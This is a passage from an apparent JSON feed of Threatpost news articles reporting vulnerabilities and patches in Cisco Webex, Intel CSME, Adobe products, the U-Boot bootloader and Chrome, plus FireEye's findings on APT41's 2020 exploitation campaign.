Armis CISO Curtis Simpson and Threatpost for a FREE webinar, [Taming the Unmanaged and IoT Device Tsunami](<https://attendee.gotowebinar.com/register/1837650474090338831?source=ART>). Get exclusive insights on how to manage this new and growing attack surface. 
[Please register here](<https://attendee.gotowebinar.com/register/1837650474090338831?source=ART>) for this sponsored webinar._**\n", "cvss3": {}, "published": "2020-05-19T15:44:46", "type": "threatpost", "title": "Adobe Patches Critical RCE Flaw in Character Animator App", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-24400", "CVE-2020-24407", "CVE-2020-9586", "CVE-2020-9616", "CVE-2020-9617", "CVE-2020-9618"], "modified": "2020-05-19T15:44:46", "id": "THREATPOST:20ECC314C8122C21B6B0C611C14F1A13", "href": "https://threatpost.com/adobe-patches-critical-rce-flaw-character-animator/155882/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-15T22:25:39", "description": "UPDATE\n\nCisco Systems has fixed a high-severity vulnerability in its popular Webex video conferencing platform, which could let strangers barge in on password-protected meetings \u2013 no authentication necessary.\n\nA remote attacker would not need to be authenticated to exploit the flaw, according to Cisco. All an attacker would need is the meeting ID and a Webex mobile application for either iOS or Android.\n\n\u201cAn unauthorized attendee could exploit this vulnerability by accessing a known meeting ID or meeting URL from the mobile device\u2019s web browser. The browser will then request to launch the device\u2019s Webex mobile application,\u201d wrote Cisco in a [Friday advisory](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20200124-webex-unauthjoin>). Next, the interloper can access the specific meeting via the mobile Webex app, no password required.\n\n\u201cThe vulnerability is due to unintended meeting information exposure in a specific meeting join flow for mobile applications,\u201d Cisco said. 
\u201cAn unauthorized attendee could exploit this vulnerability by accessing a known meeting ID or meeting URL from the mobile device\u2019s web browser.\u201d\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nOne caveat to the attack is that unauthorized attendees would be visible in the attendee list of the meeting as a mobile attendee \u2013 meaning their presence could be detected by others in the meeting. However, if left undetected, an attacker would be able to eavesdrop on potentially secretive or critical business meeting details.\n\nAffected are Cisco Webex Meetings Suite sites and Cisco Webex Meetings Online sites for versions earlier than 39.11.5 (for the former) and 40.1.3 (for the latter). Cisco fixed this vulnerability in versions 39.11.5 and later and 40.1.3 and later for Cisco Webex Meetings Suite sites and Cisco Webex Meetings Online sites.\n\nNo user interaction is required for updating, according to Cisco. However, users can check that their Cisco Webex platform is up to date by:\n\n * Logging in to the Cisco Webex Meetings Suite site or Cisco Webex Meetings Online site and navigating to Downloads on the left side of the page.\n * Next to Version Information, hover over the circled i.\n * Check the value displayed next to Page version.\n\nThe flaw (CVE-2020-3142), which has a CVSS score of 7.5 out of 10, was found internally during the resolution of a Cisco TAC support case.\n\n\u201cThe Cisco Product Security Incident Response Team (PSIRT) is not aware of any public announcements of the vulnerability that is described in this advisory,\u201d according to Cisco.\n\nHigh-severity and critical flaws continue to crop up for [Cisco\u2019s Webex platform](<https://threatpost.com/cisco-webex-remote-code-execution/144805/>) \u2013 including one patched just a few weeks ago that [could enable a remote attacker](<https://threatpost.com/cisco-webex-bug-allows-remote-code-execution/151724/>) to execute commands \u2013 as well as video conferencing 
applications in general. In 2018, for instance, a serious vulnerability in [Zoom\u2019s desktop conferencing application](<https://threatpost.com/critical-zoom-flaw-lets-hackers-hijack-conference-meetings/139489/>) was discovered that could allow a remote attacker to hijack screen controls and kick attendees out of meetings.\n\nThis is also only the latest security update issued this week by Cisco \u2013 the telecom giant on Wednesday [released updates addressing 27 flaws](<https://tools.cisco.com/security/center/publicationListing.x?product=Cisco&sort=-day_sir&limit=50#~Vulnerabilities>), including a critical flaw in its [administrative management tool](<https://threatpost.com/cisco-critical-network-security-tool-flaw/152131/>) for Cisco network security solutions. Earlier this month, Cisco [fixed two high-severity vulnerabilities](<https://threatpost.com/cisco-webex-bug-allows-remote-code-execution/151724/>) in its products, including one in its popular Webex video conferencing platform, that could enable a remote attacker to execute commands. 
Also earlier in January, [Cisco patched three critical vulnerabilities](<https://threatpost.com/cisco-patches-3-critical-bugs-nx-os/151529/>) (CVE-2019-15975, CVE-2019-15976, CVE-2019-15977) in its Data Center Network Manager (DCNM), for which a [proof-of-concept exploit](<https://threatpost.com/cisco-dcnm-flaw-exploit/151949/>) was later published.\n\n_(This article was updated 1/25/20 at 2:45 pm ET to more accurately reflect the specific attack vector.)_\n", "cvss3": {}, "published": "2020-01-24T19:27:45", "type": "threatpost", "title": "Cisco Webex Flaw Lets Unauthenticated Users Join Private Online Meetings", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-15975", "CVE-2019-15976", "CVE-2019-15977", "CVE-2020-24400", "CVE-2020-24407", "CVE-2020-3142"], "modified": "2020-01-24T19:27:45", "id": "THREATPOST:525BDFF0E0C4D33D5E543DA8234EA30B", "href": "https://threatpost.com/cisco-webex-flaw-lets-unauthenticated-users-join-private-online-meetings/152191/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-15T22:24:39", "description": "Intel is warning of a high-severity flaw in the firmware of its converged security and management engine (CSME), which if exploited could allow privilege escalation, denial of service and information disclosure.\n\nCSME powers Intel\u2019s Active Management System hardware and firmware technology, used for remote out-of-band management in consumer or corporate PCs, Internet of Things (IoT) devices, and workstations.\n\nThe subsystem of CSME has an improper authentication bug ([CVE-2019-14598](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14598>)), which has a CVSS score of 8.2 out of 10.0, making it high severity. 
A privileged user, with local access, could exploit the flaw to launch an array of attacks, according to Intel.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cIntel recommends updating to Intel CSME versions 12.0.49, 13.0.21, and 14.0.11 or later provided by the system manufacturer that addresses these issues,\u201d [according to Intel\u2019s advisory](<https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00307.html>). \u201cIntel recommends IOT customers using Intel CSME version 12.0.55 to update to 12.0.56 or later provided by the system manufacturer that addresses these issues.\u201d\n\nIt\u2019s not the first serious flaw found in CSME. In November, a [critical flaw in CSME](<https://threatpost.com/intel-critical-info-disclosure-bug-security-engine/150124/>) was patched that could allow escalation of privilege, denial of service or information disclosure. Another critical flaw [discovered in May](<https://threatpost.com/intel-fixes-critical-high-severity-flaws-across-several-products/144940/>) could allow an authenticated user to enable escalation of privilege over network access in CSME.\n\n## Other Flaws\n\nOverall, Intel patched six flaws on Tuesday, including the high-severity flaw in CSME. The remainder of the vulnerabilities were medium and low-severity.\n\nA medium-severity flaw was found in Intel Renesas Electronics USB 3 driver, the driver for the USB 3 Renesas Electronics adapter that comes in many common Intel motherboards. The flaw allows privilege escalation ([CVE-2020-0560](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0560>)) and stems from improper permissions in the installer. Intel said that rather than releasing updates, it has issued a product discontinuation notice for the driver. 
All versions of the driver are affected.\n\n\u201cIntel has issued a Product Discontinuation notice for Intel Renesas Electronics USB 3.0 Driver and recommends that users of the Intel Renesas Electronics USB 3.0 Driver uninstall it or discontinue use at their earliest convenience,\u201d [Intel said](<https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00273.html>).\n\nTwo medium-severity flaws exist in versions of the Intel RAID Web Console, which allows users to configure the Intel RAID custom storage controllers and disk drives installed on a system. One medium-severity [privilege escalation flaw](<https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00341.html>) exists in Intel RAID Web Console 3 for Windows ([CVE-2020-0564](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0564>)), which stems from improper permissions in the installer. The other exists in [Intel RAID Web Console 2](<https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00339.html>), also stemming from improper permissions in the installer ([CVE-2020-0562](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0562>)). Intel also patched [a medium-severity flaw](<https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00340.html>) in Intel Manycore Platform Software Stack, a series of Intel software components necessary to run the Intel Xeon Phi Coprocessor. The flaw ([CVE-2020-0563](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0563>)) allows privilege escalation and stems from improper permissions in the installer.\n\nFinally, a low-severity flaw was [discovered and patched](<https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00336.html>) in the Intel Software Guard Extension (SGX) SDK, which, if exploited, could enable privilege escalation.\n\nThese are only the latest in a series of Intel security updates. 
In January, Intel [warned of a high-severity](<https://threatpost.com/intel-fixes-high-severity-flaw-in-performance-analysis-tool/151837/>) vulnerability in its performance analysis tool called Intel VTune Profiler. If exploited, the flaw allows an adversary to perform a privilege escalation attack, giving them elevated and unauthorized access to a targeted system. Also in January, [Intel disclosed](<https://threatpost.com/new-cacheout-attack-targets-intel-cpus/152323/>) a new speculative-execution attack, dubbed CacheOut, that could allow attackers to trigger data leaks from most Intel CPUs.\n\n_**Learn how Operational Technology and Information Technology systems are merging and changing security playbooks in this free Threatpost Webinar. Join us [Wednesday, Feb. 19 at 2 p.m. ET](<https://attendee.gotowebinar.com/register/2652328115100076035?source=art>) when a panel of OT and IT security experts will discuss how this growing trend is shaping security approaches for IoT and 5G rollouts. This webinar is for security and DevOps engineers, IoT edge developers and security executives.**_\n", "cvss3": {}, "published": "2020-02-11T19:46:29", "type": "threatpost", "title": "Intel Patches High-Severity Flaw in Security Engine", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-14598", "CVE-2020-0560", "CVE-2020-0562", "CVE-2020-0563", "CVE-2020-0564", "CVE-2020-24400", "CVE-2020-24407"], "modified": "2020-02-11T19:46:29", "id": "THREATPOST:D7E85EFA2708BCF8E9777438F3726A49", "href": "https://threatpost.com/intel-patches-high-severity-flaw-in-security-engine/152794/", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-10-15T22:21:28", "description": "Adobe released security patches for vulnerabilities in its ColdFusion, After Effects and Digital Editions applications. 
If exploited, the flaws could enable attackers to view sensitive data, gain escalated privileges, and launch denial-of-service attacks. Each of the bugs was rated important severity, based on CVSS rankings, marking an extremely low-volume month for Adobe bug fixes.\n\nOverall, Adobe patched flaws tied to five CVEs on Tuesday as [part of its regularly scheduled](<https://blogs.adobe.com/psirt/?p=1859>) security updates. That number pales in comparison to [March, where Adobe patched flaws](<https://threatpost.com/critical-adobe-photoshop-acrobat-reader-flaws/153902/>) in an out-of-band update tied to 41 CVEs across its products, 29 of which were critical in severity. In February, Adobe patched flaws tied to 42 CVEs in its [regularly scheduled updates](<https://blogs.adobe.com/psirt/?p=1830>), 35 of which were critical in severity.\n\n\u201cAfter several months of heavy and highly critical patches, Adobe is giving us a break of sorts,\u201d said Jay Goodman, strategic product marketing manager at Automox, in a statement. \u201cAlthough the CVEs are only marked as important, it is still a good cyber hygiene practice to get your applications patched to reduce your risk exposure.\u201d\n\nThree of the vulnerabilities disclosed this week [were discovered in ColdFusion](<https://helpx.adobe.com/security/products/coldfusion/apsb20-18.html>), Adobe\u2019s commercial rapid web-application development platform. 
These flaws included an insufficient input validation flaw ([CVE-2020-3767](<https://vulmon.com/vulnerabilitydetails?qid=CVE-2020-3767>)) that could enable application-level denial of service (DoS), a DLL search-order hijacking glitch ([CVE-2020-3768](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=2020-3768>)) that could enable privilege escalation, and an improper access control flaw ([CVE-2020-3796](<https://vulmon.com/vulnerabilitydetails?qid=CVE-2020-3796>)) that could lead to system file structure disclosure.\n\nAffected are Update 14 and earlier of ColdFusion 2016 (users are encouraged to update to Update 15) and Update 8 and earlier of ColdFusion 2018 (fixed in Update 9). These flaws have a Priority 2 update rating, meaning that the flaws were found in a product \u201cthat has historically been at elevated risk\u201d \u2013 but \u201cthere are currently no known exploits,\u201d according to Adobe.\n\nJason Troy (CVE-2020-3767); Nuttakorn Tungpoonsup and Ammarit Thongthua from Secure D Center\u2019s research team and security researcher Sittikorn Sangrattanapitak (CVE-2020-3768); and Raki Ben Hamouda (CVE-2020-3796) were credited with discovering the flaws.\n\nAdobe also patched an [information disclosure flaw](<https://helpx.adobe.com/security/products/after_effects/apsb20-21.html>) in Adobe After Effects, its digital visual effects, motion graphics, and compositing application, for Windows. The vulnerability (CVE-2020-3809) stems from an out-of-bounds read glitch. Matt Powell of Zero Day Initiative (ZDI) was credited with discovering the flaw.\n\nDustin Childs, manager with the ZDI program, told Threatpost that this flaw allows remote attackers to disclose sensitive information on affected installations of Adobe After Effects. User interaction is required to exploit this vulnerability, in that the target must visit a malicious page or open a malicious file, he said.\n\n\u201cThe specific flaw exists within the parsing of TIF files,\u201d Childs told Threatpost. 
\u201cCrafted data in a TIF file can trigger a read past the end of an allocated buffer. An attacker can leverage this in conjunction with other vulnerabilities to execute code in the context of the current process.\u201d\n\nAffected are After Effects versions 17.0.1 and earlier; a fix is available in version 17.0.6 for Windows and macOS.\n\nAnother flaw, [disclosed in Adobe Digital Editions](<https://helpx.adobe.com/security/products/Digital-Editions/apsb20-23.html>), its ebook reader software program, could enable information disclosure. This vulnerability (CVE-2020-3798) stems from file enumeration (host or local network). Affected are versions of Digital Editions 4.5.11.187212 and below for Windows; users are encouraged to update to version 4.5.11.187303. Gertjan Franken and Tom Van Goethem from imec-DistriNet, KU Leuven were credited with discovering the flaw.\n\n**_Worried about your cloud security in the work-from-home era? On _****_April 23 at 2 p.m. ET_****_, join DivvyCloud and Threatpost for a FREE webinar, _**[**_A Practical Guide to Securing the Cloud in the Face of Crisis_**](<https://attendee.gotowebinar.com/register/4136632530104301068?source=art>)**_. Get exclusive research insights and critical, advanced takeaways on how to avoid cloud disruption and chaos in the face of COVID-19 \u2013 and during all times of crisis. 
_**[**_Please register here_**](<https://attendee.gotowebinar.com/register/4136632530104301068?source=art>)_** for this sponsored webinar.**_\n", "cvss3": {}, "published": "2020-04-14T18:23:05", "type": "threatpost", "title": "Adobe Fixes 'Important' Flaws in ColdFusion, After Effects and Digital Editions", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-24400", "CVE-2020-24407", "CVE-2020-3767", "CVE-2020-3768", "CVE-2020-3796", "CVE-2020-3798", "CVE-2020-3809"], "modified": "2020-04-14T18:23:05", "id": "THREATPOST:54F790259E54FB2B08B5ABB20B033701", "href": "https://threatpost.com/adobe-fixes-important-flaws-in-coldfusion-after-effects-and-digital-editions/154780/", "cvss": {"score": 4.4, "vector": "AV:L/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-10-15T22:29:26", "description": "Multiple vulnerabilities have been found in [Das U-Boot](<https://www.denx.de/wiki/U-Boot>), a universal bootloader commonly used in embedded devices like Amazon Kindles, ARM Chromebooks and networking hardware. The bugs could allow attackers to gain full control of an impacted device\u2019s CPU and modify anything they choose.\n\nResearchers at ForAllSecure found the flaws in U-Boot\u2019s file system drivers. They include a recursive stack overflow in the DOS partition parser, a pair of buffer-overflows in ext4 and a double-free memory corruption flaw in ext4. They open the door to denial-of-service attacks, device takeover and code-execution.\n\nThere are both local and remote paths to exploitation for these flaws. 
If a vulnerable device is configured to boot from external media, such as an SD card or USB drive, attackers with physical access could subvert the normal boot process of the device and control the loading of the operating system, giving them substantial control over the device.\n\nIf the device is configured to network boot, remote attackers could first compromise the corporate or Wi-Fi network that a target device is attached to (for example, by social-engineering malware onto a victim\u2019s endpoint or exploiting known vulnerabilities), and then attack the U-Boot device from that local network position.\n\n\u201cThe most obvious route for exploitation requires physical access, and could either cause denial of service (possible device bricking) or could subvert the boot process for a device or possibly bypass trusted boot,\u201d Maxwell Koo, ForAllSecure analysis engineer, told Threatpost in an interview. \u201cIf a device is configured to allow pxe boot and is configured with CONFIG_CMD_FS_GENERIC, there is a possible network avenue of exploitation via CVE-2019-13104 through -13106, with the same impact.\u201d\n\nHe added, \u201cI\u2019d say it would take moderate-to-high expertise to develop an initial exploit for a given device.\u201d\n\n## Technical Details\n\nCVE-2019-13103 is a stack overflow that affects all versions of U-Boot in the archives; it occurs when reading a DOS partition table that refers to itself. 
This causes the \u201cpart_get_info_extended\u201d function to call itself repeatedly with the same arguments, resulting in unbounded stack growth.\n\n\u201cOn QEMU\u2019s vexpress-a15 board, the CPU returns to 0 but continues executing NOPs until it hits data and executes it,\u201d according to the [GitHub write-up](<https://gist.github.com/deephooloovoo/d91b81a1674b4750e662dfae93804d75>) from the ForAllSecure interns who discovered the flaws, Paul Emge and Zion Basque.\n\nIn a technical analysis shared with Threatpost, the researchers explained that in testing, an emulated [ARM CPU](<https://threatpost.com/google-arm-android-bugs-memory-tagging/146950/>) \u201cis happy to execute a bunch of NOPs from this memory location, until, after many megabytes, it reaches some data and returns to 0 again.\u201d This would lead to DoS, but depending on the exact system and software installed, something worse could happen.\n\n\u201cFor example, other data in this part of the address space could get executed and lead to other anomalous behaviors, including the ability to run attacker provided code,\u201d they wrote.\n\nAs for the buffer-overflow flaws, CVE-2019-13104 affects U-Boot versions 2016.11-rc1 through 2019.07-rc4. At ext4fs.c:74, it is possible for len to underflow while listing files in a crafted filesystem.\n\n\u201cIf this happens, eventually there is a memcpy with a negative (so effectively infinite) length,\u201d the research pair wrote. \u201cThis causes all of memory to be overwritten until [in sandbox testing], it segfaults\u2026 There\u2019s definitely memory corruption.\u201d\n\nThe second, more serious buffer-overflow issue is CVE-2019-13106, affecting U-Boot versions 2016.09 through 2019.07-rc4. The ext4 code can overwrite portions of the stack with 0s in the ext4fs_read_file function, while listing files in an untrusted filesystem. 
Researchers said that the bug could \u201ceasily give complete control of the CPU,\u201d which would defeat verified boot.\n\n\u201cThe bug occurs when a filename (or potentially some other structure) is located across a block boundary,\u201d explained the researchers in the GitHub post. \u201cThe number of 0s written to the stack is controllable by changing the position of the filename.\u201d\n\nAnd in CVE-2019-13105, which affects U-Boot versions 2019.07-rc1 through 2019.07-rc4, if there is an invalid or out-of-bounds block number, ext_cache_read doesn\u2019t set the freed cache->buf to 0, which results in a double-free issue in ext_cache_ini. A double-free vulnerability occurs when, as the name says, a pointer is free()\u2019d twice. The pointer variable is still usable, but the memory it points to has already been freed.\n\nForAllSecure also found five low-severity divide-by-zero bugs, triggered by invalid extended file systems.\n\nU-Boot patched the bugs as of its v. 2019.10 release \u2013 but devices are likely still vulnerable given that the update process is controlled by the vendor of the device rather than U-Boot itself.\n\n\u201cAs a bootloader, which is often used in embedded devices with a long/non-existent update cycle, the unpatched code is likely present and will remain present on many devices for some time,\u201d Koo told Threatpost. \u201cSeverity depends somewhat on configuration of the device in question (U-Boot is pretty configurable and this will differ a lot between devices).\u201d\n\nAmazon did not immediately respond to a request for comment.\n\nIf support for DOS partitions or ext4 filesystem images is not present in the U-Boot configuration of a device, then the bugs have no impact.\n\n**_What are the top risks to modern enterprises in the peak era of data breaches? 
Find out: Join breach expert Chip Witt from SpyCloud and Threatpost senior editor Tara Seals, in our upcoming free _**[**_Threatpost webinar_**](<https://attendee.gotowebinar.com/register/3127445778613605890?source=ART>)**_, \u201cTrends in Fortune 1000 Breach Exposure.\u201d _**[**_Click here to register_**](<https://attendee.gotowebinar.com/register/3127445778613605890?source=ART>)**_._**\n", "cvss3": {}, "published": "2019-11-07T17:31:06", "type": "threatpost", "title": "Amazon Kindle, Embedded Devices Open to Code-Execution", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-13103", "CVE-2019-13104", "CVE-2019-13105", "CVE-2019-13106", "CVE-2020-24400", "CVE-2020-24407", "CVE-2020-5135"], "modified": "2019-11-07T17:31:06", "id": "THREATPOST:D0762E9D61E59AD261E8F24340AE261C", "href": "https://threatpost.com/amazon-kindle-embedded-devices-code-execution/150003/", "cvss": {"score": 8.3, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:C"}}, {"lastseen": "2020-10-16T22:09:20", "description": "Google has stomped out several serious code-execution flaws in its Chrome browser. To exploit the flaws, an attacker would merely need to convince a target to visit a specially crafted webpage via phishing or other social-engineering lures.\n\nOverall, Google\u2019s release of Chrome 85.0.4183.121 for Windows, Mac and Linux \u2013 which will roll out over the coming days \u2013 fixed 10 vulnerabilities. The successful exploitation of the most severe of these could allow an attacker to execute arbitrary code in the context of the browser, according to Google. Google Chrome versions prior to 85.0.4183.121 are affected.\n\n\u201cDepending on the privileges associated with the application, an attacker could view, change or delete data,\u201d [according to Google\u2019s Tuesday security advisory](<https://chromereleases.googleblog.com/2020/09/stable-channel-update-for-desktop_21.html>). 
\u201cIf this application has been configured to have fewer user rights on the system, exploitation of the most severe of these vulnerabilities could have less impact than if it was configured with administrative rights.\u201d\n\nGoogle disclosed five high-severity flaws in its Tuesday advisory, although technical details remain scant as this information is usually \u201ckept restricted until a majority of users are updated with a fix,\u201d according to its advisory.\n\nHowever, Google did say that \u201cthese vulnerabilities can be exploited if a user visits, or is redirected to, a specially crafted web page.\u201d\n\nThe high-severity flaws include an out-of-bounds read error in storage in Google Chrome ([CVE-2020-15960](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15960>)). This heap buffer-overflow flaw could allow a remote attacker to potentially perform out-of-bounds memory access via a crafted HTML page.\n\nAlso fixed were three flaws relating to insufficient policy enforcement. These include two bugs stemming from extensions in Google Chrome ([CVE-2020-15961](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15961>), [CVE-2020-15963](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15963>)), which could allow an attacker who convinced a user to install a malicious extension to potentially perform a sandbox escape via a crafted Chrome Extension.\n\nThe third insufficient policy-enforcement issue ([CVE-2020-15962](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15962>)) exists in Chrome\u2019s serial function, and could allow a remote attacker to potentially perform out-of-bounds memory access via a crafted HTML page.\n\nFinally, Google fixed an out-of-bounds write flaw ([CVE-2020-15965](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15965>)) in V8, an open-source JavaScript engine developed by The Chromium Project for Google Chrome and Chromium web browsers. 
The flaw could allow a remote attacker to potentially perform out-of-bounds memory access via a crafted HTML page.\n\nGoogle said that there are currently no reports of these vulnerabilities being exploited in the wild. The company urged Chrome users to apply the stable channel update to vulnerable systems immediately, and reminded users \u201cnot to visit un-trusted websites or follow links provided by unknown or un-trusted sources.\u201d\n\nLast month, Google fixed various severe vulnerabilities in its web browsers, including a bug in [Google\u2019s Chromium-based browsers](<https://threatpost.com/google-chrome-bug-data-theft/158217/>) that could allow attackers to bypass the Content Security Policy (CSP) on websites, in order to steal data and execute rogue code. Google also fixed a [high-severity Chrome vulnerability](<https://threatpost.com/google-fixes-high-severity-chrome-browser-code-execution-bug/158600/>) that could be used to execute arbitrary code, in August.\n", "cvss3": {}, "published": "2020-09-22T18:44:57", "type": "threatpost", "title": "Google Chrome Bugs Open Browsers to Attack", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-15960", "CVE-2020-15961", "CVE-2020-15962", "CVE-2020-15963", "CVE-2020-15965", "CVE-2020-24400", "CVE-2020-24407"], "modified": "2020-09-22T18:44:57", "id": "THREATPOST:EC00DBD1B5F3C10C2DB3271A9666C8FE", "href": "https://threatpost.com/google-chrome-attack/159466/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-10-15T22:22:15", "description": "Researchers warn that APT41, a notorious China-linked threat group, has targeted more than 75 organizations worldwide in \u201cone of the broadest campaigns by a Chinese cyber-espionage actor observed in recent years.\u201d\n\nBetween Jan. 20 and March 11, researchers observed APT41 exploiting vulnerabilities in Citrix NetScaler/ADC, Cisco routers and Zoho ManageEngine Desktop Central as part of the widespread espionage campaign. 
Researchers said it\u2019s unclear if APT41 attempted exploitation en masse, or if they homed in on specific organizations \u2014 but the victims do appear to be more targeted in nature.\n\n\u201cWhile APT41 has previously conducted activity with an extensive initial entry such as the trojanizing of NetSarang software, this scanning and exploitation has focused on a subset of our customers, and seems to reveal a high operational tempo and wide collection requirements for APT41,\u201d wrote Christopher Glyer, Dan Perez, Sarah Jones and Steve Miller with FireEye, in a [Wednesday analysis](<https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html>).\n\nDozens of companies from various industries were targeted, including banking and finance, defense industrial bases, government, healthcare, legal, manufacturing, media, non-profit, oil and gas, transportation and utilities. APT41 also targeted firms from a broad array of countries, including Australia, Canada, Denmark, Finland, France, India, Italy, Japan, Malaysia, Mexico, the Philippines, Poland, Qatar, Saudi Arabia, Singapore, Sweden, Switzerland, UAE, the U.K. and the U.S.\n\n## Cisco, Citrix and Zoho Exploits\n\nStarting on Jan. 20, researchers observed the threat group attempting to exploit the notorious flaw ([CVE-2019-19781](<https://support.citrix.com/article/CTX267027>)) in Citrix Application Delivery Controller (ADC) and Citrix Gateway devices, which was revealed as a zero-day and then patched earlier this year. It was [disclosed on Dec. 
17](<https://threatpost.com/critical-citrix-bug-80000-corporate-lans-at-risk/151444/>) \u2013 and [proof of concept (PoC) code](<https://threatpost.com/unpatched-citrix-flaw-exploits/151748/>) was released shortly after \u2013 before a patch [was issued in January](<https://threatpost.com/citrix-patch-rollout-critical-rce-flaw/152041/>).\n\nIn this campaign, researchers observed three waves of exploits against [CVE-2019-19781](<https://threatpost.com/critical-citrix-rce-flaw-corporate-lans/152677/>) \u2013 the first on Jan. 20 \u2013 21, the second on Feb. 1, and finally a \u201csignificant uptick\u201d in exploitation on Feb. 24 \u2013 25.\n\nPost-exploit, APT41 executed a command (\u2018file /bin/pwd\u2019) on affected systems that researchers say may have achieved two objectives: \u201cFirst, it would confirm whether the system was vulnerable and the mitigation wasn\u2019t applied,\u201d researchers noted. \u201cSecond, it may return architecture-related information that would be required knowledge for APT41 to successfully deploy a backdoor in a follow-up step.\u201d\n\nOn Feb. 21, researchers next observed APT41 switching gears to exploit a Cisco RV320 router (Cisco\u2019s WAN VPN routers for small businesses) at a telecommunications organization. After exploitation, the threat actors downloaded an executable and linkable format (ELF) binary payload. 
Researchers aren\u2019t sure what specific exploit was used in this case, but pointed to a Metasploit module combining two CVEs ([CVE-2019-1653](<https://nvd.nist.gov/vuln/detail/CVE-2019-1653>) and [CVE-2019-1652](<https://nvd.nist.gov/vuln/detail/CVE-2019-1652>)) to [enable remote code execution on Cisco RV320 and RV325](<https://www.rapid7.com/db/modules/exploit/linux/http/cisco_rv32x_rce>) small business routers.\n\nFinally, on March 8, the threat actor was observed [exploiting a critical vulnerability](<https://threatpost.com/critical-zoho-zero-day-flaw-disclosed/153484/>) in Zoho ManageEngine Desktop Central, an endpoint management tool to help users manage their servers, laptops, smartphones, and more from a central location. The flaw ([CVE-2020-10189](<https://nvd.nist.gov/vuln/detail/CVE-2020-10189>)) was first disclosed on March 5 as a zero-day, and [was later patched](<https://www.us-cert.gov/ncas/current-activity/2020/03/06/zoho-releases-security-update-manageengine-desktop-central>) on March 7. The attackers exploited the flaw to deploy payloads (install.bat and storesyncsvc.dll) in two ways. First, after exploiting the flaw, they directly uploaded a simple Java-based program (\u201clogger.zip\u201d) containing a set of commands, which then used PowerShell to download and execute the payloads. In a second attack, APT41 leveraged a legitimate Microsoft command-line tool, BITSAdmin, to download the payload.\n\nNotably, after exploitation, the attackers have been seen leveraging only publicly available malware, including Cobalt Strike (a [commercially available exploitation framework](<https://threatpost.com/apt29-re-emerges-after-2-years-with-widespread-espionage-campaign/139246/>)) and Meterpreter (a Metasploit attack payload that provides an interactive shell from which an attacker can explore the target machine and execute code). 
Said researchers: \u201cWhile these backdoors are full featured, in previous incidents APT41 has waited to deploy more advanced malware until they have fully understood where they were and carried out some initial reconnaissance.\u201d\n\n## APT41 Activity\n\nInterestingly, between waves of exploitation, researchers observed lulls in APT41 activity. The first lull, between Jan. 23 and Feb. 1, was likely related to the Chinese Lunar New Year holidays (which occurred Jan. 24 \u2013 30): \u201cThis has been a common activity pattern by Chinese APT groups in past years as well,\u201d said researchers.\n\nThe second lull, occurring Feb. 2 \u2013 19, may have been related to fallout from the rapid spread of the coronavirus pandemic. Researchers noted that China had initiated [COVID-19-related quarantines](<https://threatpost.com/coronavirus-themed-cyberattacks-persists/153493/>) in cities in the Hubei province Jan. 23 \u2013 24, and rolled out quarantines to additional provinces starting between Feb. 2 and Feb. 10.\n\n\u201cWhile it is possible that this reduction in activity might be related to the COVID-19 quarantine measures in China, APT41 may have remained active in other ways, which we were unable to observe with FireEye telemetry,\u201d said researchers.\n\nThey also said that [APT41](<https://threatpost.com/fortnite-ransomware-masquerades-as-an-aimbot-game-hack/147549/>) has [historically](<https://www.fireeye.com/blog/threat-research/2019/08/apt41-dual-espionage-and-cyber-crime-operation.html>) (since 2012) conducted dual Chinese state-sponsored espionage activity and personal, financially motivated activity. 
More recently, in October 2019, the [threat group was discovered](<https://threatpost.com/china-hackers-spy-texts-messagetap-malware/149761/>) using a new malware strain to intercept telecom SMS server traffic and sniff out certain phone numbers and SMS messages \u2013 particularly those with keywords relating to Chinese political dissidents.\n\n\u201cIn 2020, APT41 continues to be one of the most prolific threats that FireEye currently tracks,\u201d said researchers on Wednesday. \u201cThis new activity from this group shows how resourceful and how quickly they can leverage newly disclosed vulnerabilities to their advantage.\u201d\n\n_**Do you suffer from Password Fatigue? On [Wednesday April 8 at 2 p.m. ET](<https://attendee.gotowebinar.com/register/7732731543372035596?source=art>) join **_**_Duo Security and Threatpost as we explore a [passwordless](<https://attendee.gotowebinar.com/register/7732731543372035596?source=art>) future. This [FREE](<https://attendee.gotowebinar.com/register/7732731543372035596?source=art>) webinar maps out a future where modern authentication standards like WebAuthn significantly reduce a dependency on passwords. We\u2019ll also explore how teaming with 